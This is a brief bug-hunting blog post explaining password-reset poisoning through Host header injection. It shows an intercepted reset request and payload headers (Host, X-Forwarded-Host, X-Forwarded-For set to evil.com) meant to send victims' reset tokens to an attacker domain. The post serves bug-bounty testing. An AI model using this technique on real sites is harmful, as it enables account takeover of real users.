How to find an easy P2
2 min readJun 2, 2019
Hi everyone,
This post is about low effort P2 bug, this bug is not common and its severity is high but finding it is a piece of cake and only takes less than 5 minutes
here is a step by step procedure:
- lets say we have target example.com
- go to password reset feature and request password reset and intercept request
- lets say HTTP request looks like this(i have redacted all the gibberish cookies, and target name)
POST /api/reset-password/submit-email HTTP/1.1
Host: www.example.ca
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.ca/reset-password
Content-Type: application/json
X-CSRF-Token: [Redacted]
Origin: https://www.example.ca
Content-Length: 42
Connection: close
Cookie: ck_cabf=[Redacted]; ck_pcid=[Redacted]; _ga=[Redacted]; __utma=[Redacted]; __utmz=; ck_crumb=[Redacted]; utag_main=[Redacted]; _gid=[Redacted]; _gat=1{"emailAddress":"[Redacted]"}
4.there are 3 steps that you can try to check cache poisoning
(i) edit the host to Host: evil.com
(ii)leave the host and in the line below host add X-Forwarded-Host: evil.com
(iii)if (ii) doesnt work then use X-Forwarded-For: evil.com
5. if it is vulnerable you will get the mail to your registered mail address,and when you will open the mail you will be redirected to something like https://evil.com/yourResetToken which means now the evil domain has your token and it will cause account takeover
hope you liked this
